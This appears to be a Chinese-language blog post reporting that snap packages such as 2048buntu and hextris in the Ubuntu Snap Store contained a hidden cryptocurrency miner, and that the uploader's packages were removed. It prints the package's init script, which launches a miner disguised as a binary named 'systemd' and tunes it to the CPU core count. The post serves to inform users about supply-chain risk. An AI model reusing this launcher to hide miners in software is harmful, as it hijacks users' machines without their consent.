Ubuntu软件中心的安装包也不安全,最近一些snap软件包中的恶意软件在Ubuntu Snaps Store被发现。

用户Nicolas Tomb上传至2048buntu和hextris的两个snap捕获包中包含恶意软件。被发现后,所有由Nicolas开发的软件包已经从Ubuntu Snaps Store中删除。

2048buntu snap程序包(以及Nicolas Tomb的其他程序包)包含一个隐藏的加密货币矿工。 下面的是init脚本:

#!/bin/bash

currency=bcn
name=2048buntu


{ # try
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1 -g
} || { # catch
cores=($(grep -c ^processor /proc/cpuinfo))

if (( $cores < 4 )); then
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1
else
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 2
fi
}

为什么会发生这种情况?

为了用户提供更易于安装的软件包。Ubuntu Snap Store允许任何人上传snap软件包,而不是官方Ubuntu软件库中的软件包(deb)。

标签: 安全
⇠ Adding Google Custom Search to AMP site 如何隐藏IP地址 ⇢

GFW VPN

提供vpn服务,针对中国互联网用户,完全可以突破GFW的封锁. 经过了长期测试,运行非常的稳定.

Send Mail

注册账号